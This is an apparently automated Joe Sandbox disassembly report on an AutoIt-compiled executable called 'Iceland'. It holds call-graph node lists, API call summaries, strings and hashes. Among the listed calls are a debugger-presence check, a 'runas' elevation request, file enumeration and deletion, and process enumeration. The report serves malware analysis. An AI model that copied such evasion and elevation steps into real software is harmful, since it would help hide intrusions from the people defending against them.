103466->103468 103469 a26bd4 __fread_nolock 103467->103469 103470 a6586a 103468->103470 103469->103417 103471 a4017b 8 API calls 103470->103471 103472 a6589a __fread_nolock 103471->103472 103473->102953 103474->102962 103475->102961 103486 a8e80e 103476->103486 103478 a8ddd4 Process32NextW 103479 a8de86 CloseHandle 103478->103479 103483 a8ddcd 103478->103483 103479->102969 103480 a2bf73 8 API calls 103480->103483 103481 a2b329 8 API calls 103481->103483 103482 a2568e 8 API calls 103482->103483 103483->103478 103483->103479 103483->103480 103483->103481 103483->103482 103484 a27bb5 8 API calls 103483->103484 103492 a3e36b 41 API calls 103483->103492 103484->103483 103490 a8e819 103486->103490 103487 a8e830 103494 a4666b 39 API calls _strftime 103487->103494 103490->103487 103491 a8e836 103490->103491 103493 a46722 GetStringTypeW _strftime 103490->103493 103491->103483 103492->103483 103493->103490 103494->103491 103496 a23996 ___scrt_fastfail 103495->103496 103517 a25f32 103496->103517 103500 a23a3a Shell_NotifyIconW 103521 a261a9 103500->103521 103501 a640cd Shell_NotifyIconW 103502 a23a1c 103502->103500 103502->103501 103504 a23a50 103504->102984 103506 a23969 103505->103506 103507 a23919 ___scrt_fastfail 103505->103507 103506->102984 103508 a23938 Shell_NotifyIconW 103507->103508 103508->103506 103509->102984 103511 a4017b 8 API calls 103510->103511 103512 a27afa 103511->103512 103513 a4014b 8 API calls 103512->103513 103514 a27b08 103513->103514 103514->102984 103515->102984 103516->102984 103518 a239eb 103517->103518 103519 a25f4e 103517->103519 103518->103502 103551 a8d11f 42 API calls _strftime 103518->103551 103519->103518 103520 a65070 DestroyIcon 103519->103520 103520->103518 103522 a261c6 103521->103522 103523 a262a8 103521->103523 103524 a27ad5 8 API calls 103522->103524 103523->103504 103525 a261d4 103524->103525 103526 a261e1 103525->103526 103527 a65278 LoadStringW 103525->103527 103528 a28577 8 API calls 103526->103528 103530 a65292 103527->103530 
103529 a261f6 103528->103529 103531 a26203 103529->103531 103538 a652ae 103529->103538 103533 a2bed9 8 API calls 103530->103533 103536 a26229 ___scrt_fastfail 103530->103536 103531->103530 103532 a2620d 103531->103532 103534 a26b7c 8 API calls 103532->103534 103533->103536 103535 a2621b 103534->103535 103537 a27bb5 8 API calls 103535->103537 103540 a2628e Shell_NotifyIconW 103536->103540 103537->103536 103538->103536 103539 a652f1 103538->103539 103541 a2bf73 8 API calls 103538->103541 103553 a3fe6f 51 API calls 103539->103553 103540->103523 103542 a652d8 103541->103542 103552 a8a350 9 API calls 103542->103552 103545 a652e3 103547 a27bb5 8 API calls 103545->103547 103546 a65310 103548 a26b7c 8 API calls 103546->103548 103547->103539 103549 a65321 103548->103549 103550 a26b7c 8 API calls 103549->103550 103550->103536 103551->103502 103552->103545 103553->103546 103554->103020 103555->103004 103556->103020 103557->103021 103558->103020 103559->102843 103560->102843 103561->102839 103562->102844 103563->102746 103564->102739 103565->102741 103566->102741 103584 a2cf80 103567->103584 103569 a2bfb5 103570 a70db6 103569->103570 103571 a2bfc3 103569->103571 103593 a2b4c8 8 API calls 103570->103593 103573 a4014b 8 API calls 103571->103573 103575 a2bfd4 103573->103575 103574 a70dc1 103576 a2bf73 8 API calls 103575->103576 103577 a2bfde 103576->103577 103578 a2bfed 103577->103578 103579 a2bed9 8 API calls 103577->103579 103580 a4014b 8 API calls 103578->103580 103579->103578 103581 a2bff7 103580->103581 103592 a2be7b 39 API calls 103581->103592 103583 a2c01b 103583->102650 103585 a2d1c7 103584->103585 103589 a2cf93 103584->103589 103585->103569 103587 a2bf73 8 API calls 103587->103589 103588 a2d03d 103588->103569 103589->103587 103589->103588 103594 a405b2 5 API calls __Init_thread_wait 103589->103594 103595 a40413 29 API calls __onexit 103589->103595 103596 a40568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103589->103596 103592->103583 103593->103574 
103594->103589 103595->103589 103596->103589 105139 a58782 105144 a5853e 105139->105144 105142 a587aa 105149 a5856f try_get_first_available_module 105144->105149 105146 a5876e 105163 a52b5c 26 API calls pre_c_initialization 105146->105163 105148 a586c3 105148->105142 105156 a60d04 105148->105156 105152 a586b8 105149->105152 105159 a4917b 40 API calls 2 library calls 105149->105159 105151 a5870c 105151->105152 105160 a4917b 40 API calls 2 library calls 105151->105160 105152->105148 105162 a4f649 20 API calls __dosmaperr 105152->105162 105154 a5872b 105154->105152 105161 a4917b 40 API calls 2 library calls 105154->105161 105164 a60401 105156->105164 105158 a60d1f 105158->105142 105159->105151 105160->105154 105161->105152 105162->105146 105163->105148 105167 a6040d ___DestructExceptionObject 105164->105167 105165 a6041b 105222 a4f649 20 API calls __dosmaperr 105165->105222 105167->105165 105169 a60454 105167->105169 105168 a60420 105223 a52b5c 26 API calls pre_c_initialization 105168->105223 105175 a609db 105169->105175 105174 a6042a __fread_nolock 105174->105158 105225 a607af 105175->105225 105178 a60a26 105243 a55594 105178->105243 105179 a60a0d 105257 a4f636 20 API calls __dosmaperr 105179->105257 105182 a60a12 105258 a4f649 20 API calls __dosmaperr 105182->105258 105183 a60a2b 105184 a60a34 105183->105184 105185 a60a4b 105183->105185 105259 a4f636 20 API calls __dosmaperr 105184->105259 105256 a6071a CreateFileW 105185->105256 105189 a60a39 105260 a4f649 20 API calls __dosmaperr 105189->105260 105190 a60b01 GetFileType 105193 a60b53 105190->105193 105194 a60b0c GetLastError 105190->105194 105192 a60ad6 GetLastError 105262 a4f613 20 API calls __dosmaperr 105192->105262 105265 a554dd 21 API calls 2 library calls 105193->105265 105263 a4f613 20 API calls __dosmaperr 105194->105263 105195 a60a84 105195->105190 105195->105192 105261 a6071a CreateFileW 105195->105261 105199 a60b1a CloseHandle 105199->105182 105202 a60b43 105199->105202 105201 a60ac9 105201->105190 
105201->105192 105264 a4f649 20 API calls __dosmaperr 105202->105264 105203 a60b74 105205 a60bc0 105203->105205 105266 a6092b 72 API calls 3 library calls 105203->105266 105210 a60bed 105205->105210 105267 a604cd 72 API calls 4 library calls 105205->105267 105206 a60b48 105206->105182 105209 a60be6 105209->105210 105211 a60bfe 105209->105211 105268 a58a2e 105210->105268 105213 a60478 105211->105213 105214 a60c7c CloseHandle 105211->105214 105224 a604a1 LeaveCriticalSection __wsopen_s 105213->105224 105283 a6071a CreateFileW 105214->105283 105216 a60ca7 105217 a60cdd 105216->105217 105218 a60cb1 GetLastError 105216->105218 105217->105213 105284 a4f613 20 API calls __dosmaperr 105218->105284 105220 a60cbd 105285 a556a6 21 API calls 2 library calls 105220->105285 105222->105168 105223->105174 105224->105174 105226 a607d0 105225->105226 105231 a607ea 105225->105231 105226->105231 105293 a4f649 20 API calls __dosmaperr 105226->105293 105229 a607df 105294 a52b5c 26 API calls pre_c_initialization 105229->105294 105286 a6073f 105231->105286 105232 a60851 105241 a608a4 105232->105241 105297 a4da7d 26 API calls 2 library calls 105232->105297 105233 a60822 105233->105232 105295 a4f649 20 API calls __dosmaperr 105233->105295 105236 a6089f 105238 a6091e 105236->105238 105236->105241 105237 a60846 105296 a52b5c 26 API calls pre_c_initialization 105237->105296 105298 a52b6c 11 API calls _abort 105238->105298 105241->105178 105241->105179 105242 a6092a 105244 a555a0 ___DestructExceptionObject 105243->105244 105301 a532d1 EnterCriticalSection 105244->105301 105246 a555a7 105247 a555cc 105246->105247 105252 a5563a EnterCriticalSection 105246->105252 105254 a555ee 105246->105254 105250 a55373 __wsopen_s 21 API calls 105247->105250 105249 a55617 __fread_nolock 105249->105183 105251 a555d1 105250->105251 105251->105254 105305 a554ba EnterCriticalSection 105251->105305 105253 a55647 LeaveCriticalSection 105252->105253 105252->105254 105253->105246 105302 a5569d 105254->105302 
105256->105195 105257->105182 105258->105213 105259->105189 105260->105182 105261->105201 105262->105182 105263->105199 105264->105206 105265->105203 105266->105205 105267->105209 105269 a55737 __wsopen_s 26 API calls 105268->105269 105272 a58a3e 105269->105272 105270 a58a44 105307 a556a6 21 API calls 2 library calls 105270->105307 105272->105270 105275 a55737 __wsopen_s 26 API calls 105272->105275 105282 a58a76 105272->105282 105273 a55737 __wsopen_s 26 API calls 105276 a58a82 CloseHandle 105273->105276 105274 a58a9c 105281 a58abe 105274->105281 105308 a4f613 20 API calls __dosmaperr 105274->105308 105277 a58a6d 105275->105277 105276->105270 105279 a58a8e GetLastError 105276->105279 105278 a55737 __wsopen_s 26 API calls 105277->105278 105278->105282 105279->105270 105281->105213 105282->105270 105282->105273 105283->105216 105284->105220 105285->105217 105289 a60757 105286->105289 105287 a60772 105287->105233 105289->105287 105299 a4f649 20 API calls __dosmaperr 105289->105299 105290 a60796 105300 a52b5c 26 API calls pre_c_initialization 105290->105300 105292 a607a1 105292->105233 105293->105229 105294->105231 105295->105237 105296->105232 105297->105236 105298->105242 105299->105290 105300->105292 105301->105246 105306 a53319 LeaveCriticalSection 105302->105306 105304 a556a4 105304->105249 105305->105254 105306->105304 105307->105274 105308->105281 103597 a765af 103598 a4014b 8 API calls 103597->103598 103599 a765b6 103598->103599 103603 a8fafb 103599->103603 103601 a765c2 103602 a8fafb 8 API calls 103601->103602 103602->103601 103604 a8fb1b 103603->103604 103605 a8fbe4 103604->103605 103606 a4017b 8 API calls 103604->103606 103605->103601 103609 a8fb57 103606->103609 103608 a8fb79 103608->103605 103610 a2bed9 8 API calls 103608->103610 103609->103608 103611 a8fbed 8 API calls 103609->103611 103610->103608 103611->103609 105309 a7400f 105324 a2eeb0 ISource 105309->105324 105310 a2f0d5 105311 a2f211 PeekMessageW 105311->105324 105312 a2ef07 GetInputState 
105579->105581 105580->105574 105581->105583 105582->105583 105584->105574 105585->105578

APIs
• GetVersionExW.KERNEL32(?), ref: 00A25FF7
  • Part of subcall function 00A28577: _wcslen.LIBCMT ref: 00A2858A
• GetCurrentProcess.KERNEL32(?,00ABDC2C,00000000,?,?), ref: 00A26123
• IsWow64Process.KERNEL32(00000000,?,?), ref: 00A2612A
• LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00A26155
• GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00A26167
• GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00A26175
• FreeLibrary.KERNEL32(00000000,?,?), ref: 00A2617C
• GetSystemInfo.KERNEL32(?,?,?), ref: 00A261A1
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
Similarity
• API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
• String ID: GetNativeSystemInfo$kernel32.dll$|O
• API String ID: 3290436268-3101561225
• Opcode ID: 46c749e8266a03ef597054963b1662e1f68edb9d34edfc51ab329666a47ea32b
• Instruction ID: 7051dbfacc79dfcdb3e439b6bf476635ab7abb75c2ceb9da25641749afbf1325
• Opcode Fuzzy Hash: 46c749e8266a03ef597054963b1662e1f68edb9d34edfc51ab329666a47ea32b
• Instruction Fuzzy Hash: E8A182B194A2D4DFC716CBFC7C417B57FA46B66300B084BA9D4819F222D23D954AEB32

APIs
• GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00A23368,?), ref: 00A233BB
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00A23368,?), ref: 00A233CE
• GetFullPathNameW.KERNEL32(00007FFF,?,?,00AF2418,00AF2400,?,?,?,?,?,?,00A23368,?), ref: 00A2343A
  • Part of subcall function 00A28577: _wcslen.LIBCMT ref: 00A2858A
  • Part of subcall function 00A2425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00A23462,00AF2418,?,?,?,?,?,?,?,00A23368,?), ref: 00A242A0
• SetCurrentDirectoryW.KERNEL32(?,00000001,00AF2418,?,?,?,?,?,?,?,00A23368,?), ref: 00A234BB
• MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00A63CB0
• SetCurrentDirectoryW.KERNEL32(?,00AF2418,?,?,?,?,?,?,?,00A23368,?), ref: 00A63CF1
• GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00AE31F4,00AF2418,?,?,?,?,?,?,?,00A23368), ref: 00A63D7A
• ShellExecuteW.SHELL32(00000000,?,?), ref: 00A63D81
  • Part of subcall function 00A234D3: GetSysColorBrush.USER32(0000000F), ref: 00A234DE
  • Part of subcall function 00A234D3: LoadCursorW.USER32(00000000,00007F00), ref: 00A234ED
  • Part of subcall function 00A234D3: LoadIconW.USER32(00000063), ref: 00A23503
  • Part of subcall function 00A234D3: LoadIconW.USER32(000000A4), ref: 00A23515
  • Part of subcall function 00A234D3: LoadIconW.USER32(000000A2), ref: 00A23527
  • Part of subcall function 00A234D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00A2353F
  • Part of subcall function 00A234D3: RegisterClassExW.USER32(?), ref: 00A23590
  • Part of subcall function 00A235B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00A235E1
  • Part of subcall function 00A235B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00A23602
  • Part of subcall function 00A235B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00A23368,?), ref: 00A23616
  • Part of subcall function 00A235B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00A23368,?), ref: 00A2361F
  • Part of subcall function 00A2396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00A23A3C
Strings
• It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00A63CAA
• runas, xrefs: 00A63D75
• AutoIt, xrefs: 00A63CA5
Memory Dump Source
• Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
Similarity
• API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
• String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
• API String ID: 683915450-2030392706
• Opcode ID: 65f5ddde570bc45204fd09ea9b52d0c126a2c48e7b753ec9422ba5a0dfff3547
• Instruction ID: 931688d9d5bc60e9eb97e82f395bb423598c7794a1c26d8a9eba814582dcbbdc
• Opcode Fuzzy Hash: 65f5ddde570bc45204fd09ea9b52d0c126a2c48e7b753ec9422ba5a0dfff3547
• Instruction Fuzzy Hash: E7511B32148355AECB05FFE8AD41EBE7BB8AF95741F00093CF581561A3DB648A4BD722

APIs
  • Part of subcall function 00A25851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A255D1,?,?,00A64B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00A25871
  • Part of subcall function 00A8EAB0: GetFileAttributesW.KERNEL32(?,00A8D840), ref: 00A8EAB1
• FindFirstFileW.KERNEL32(?,?), ref: 00A8DCCB
• DeleteFileW.KERNEL32(?,?,?,?), ref: 00A8DD1B
• FindNextFileW.KERNELBASE(00000000,00000010), ref: 00A8DD2C
• FindClose.KERNEL32(00000000), ref: 00A8DD43
• FindClose.KERNEL32(00000000), ref: 00A8DD4C
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                                                                                                                                                                • String ID: \*.*
                                                                                                                                                                                                                                                                • API String ID: 2649000838-1173974218
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 00A8DDAC
                                                                                                                                                                                                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 00A8DDBA
                                                                                                                                                                                                                                                                • Process32NextW.KERNEL32(00000000,?), ref: 00A8DDDA
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00A8DE87
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 420147892-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CloseHandleMemoryProtectVirtual
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2407445808-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetInputState.USER32 ref: 00A2EF07
                                                                                                                                                                                                                                                                • timeGetTime.WINMM ref: 00A2F107
                                                                                                                                                                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A2F228
                                                                                                                                                                                                                                                                • TranslateMessage.USER32(?), ref: 00A2F27B
                                                                                                                                                                                                                                                                • DispatchMessageW.USER32(?), ref: 00A2F289
                                                                                                                                                                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A2F29F
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(0000000A), ref: 00A2F2B1
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2189390790-0

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00A23657
• RegisterClassExW.USER32(00000030), ref: 00A23681
• RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A23692
• InitCommonControlsEx.COMCTL32(?), ref: 00A236AF
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00A236BF
• LoadIconW.USER32(000000A9), ref: 00A236D5
• ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00A236E4
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
Similarity
• API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
• String ID: +$0$AutoIt v3 GUI$TaskbarCreated
• API String ID: 2914291525-1005189915
• Opcode ID: daacaf055ada46ad7bef95f32f42b1e0203b7b9cfec153fca07ed49aa4c5c9f3
• Instruction ID: ab360adec8b2a5d566fa7afb02158116093cc33f7c8223939be4b860c2c82879
• Opcode Fuzzy Hash: daacaf055ada46ad7bef95f32f42b1e0203b7b9cfec153fca07ed49aa4c5c9f3
• Instruction Fuzzy Hash: 5621C3B5D01219AFDB00DFE4E889BEDBBB8FB08710F10421AF511A72A1E7B54586CF90

Control-flow Graph

control_flow_graph 366 a609db-a60a0b call a607af 369 a60a26-a60a32 call a55594 366->369 370 a60a0d-a60a18 call a4f636 366->370 376 a60a34-a60a49 call a4f636 call a4f649 369->376 377 a60a4b-a60a94 call a6071a 369->377 375 a60a1a-a60a21 call a4f649 370->375 386 a60cfd-a60d03 375->386 376->375 384 a60a96-a60a9f 377->384 385 a60b01-a60b0a GetFileType 377->385 388 a60ad6-a60afc GetLastError call a4f613 384->388 389 a60aa1-a60aa5 384->389 390 a60b53-a60b56 385->390 391 a60b0c-a60b3d GetLastError call a4f613 CloseHandle 385->391 388->375 389->388 395 a60aa7-a60ad4 call a6071a 389->395 393 a60b5f-a60b65 390->393 394 a60b58-a60b5d 390->394 391->375 405 a60b43-a60b4e call a4f649 391->405 398 a60b69-a60bb7 call a554dd 393->398 399 a60b67 393->399 394->398 395->385 395->388 408 a60bc7-a60beb call a604cd 398->408 409 a60bb9-a60bc5 call a6092b 398->409 399->398 405->375 416 a60bfe-a60c41 408->416 417 a60bed 408->417 409->408 415 a60bef-a60bf9 call a58a2e 409->415 415->386 418 a60c62-a60c70 416->418 419 a60c43-a60c47 416->419 417->415 423 a60c76-a60c7a 418->423 424 a60cfb 418->424 419->418 422 a60c49-a60c5d 419->422 422->418 423->424 425 a60c7c-a60caf CloseHandle call a6071a 423->425 424->386 428 a60ce3-a60cf7 425->428 429 a60cb1-a60cdd GetLastError call a4f613 call a556a6 425->429 428->424 429->428
APIs
  • Part of subcall function 00A6071A: CreateFileW.KERNEL32(00000000,00000000,?,00A60A84,?,?,00000000,?,00A60A84,00000000,0000000C), ref: 00A60737
• GetLastError.KERNEL32 ref: 00A60AEF
• __dosmaperr.LIBCMT ref: 00A60AF6
• GetFileType.KERNEL32(00000000), ref: 00A60B02
• GetLastError.KERNEL32 ref: 00A60B0C
• __dosmaperr.LIBCMT ref: 00A60B15
• CloseHandle.KERNEL32(00000000), ref: 00A60B35
• CloseHandle.KERNEL32(?), ref: 00A60C7F
• GetLastError.KERNEL32 ref: 00A60CB1
• __dosmaperr.LIBCMT ref: 00A60CB8
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
Similarity
• API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
• String ID: H
• API String ID: 4237864984-2852464175
• Opcode ID: 6a7011f312a714790d1585a9dcaa4fa4b159d50f41e64acd50f3e3764f4d4f84
• Instruction ID: 6666e3683e26c1e437ea93b721ef7f344c3f3fe3c66b36e8c298d2165ffe06be
• Opcode Fuzzy Hash: 6a7011f312a714790d1585a9dcaa4fa4b159d50f41e64acd50f3e3764f4d4f84
• Instruction Fuzzy Hash: 0FA11332A141488FDF19EFB8D852FAE7BB1AB06324F144259F811DB2E2DB319D52CB51

Control-flow Graph

APIs
  • Part of subcall function 00A25594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00A64B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00A255B2
  • Part of subcall function 00A25238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00A2525A
• RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00A253C4
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00A64BFD
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00A64C3E
• RegCloseKey.ADVAPI32(?), ref: 00A64C80
• _wcslen.LIBCMT ref: 00A64CE7
• _wcslen.LIBCMT ref: 00A64CF6
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
Similarity
• API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
• String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
• API String ID: 98802146-2727554177
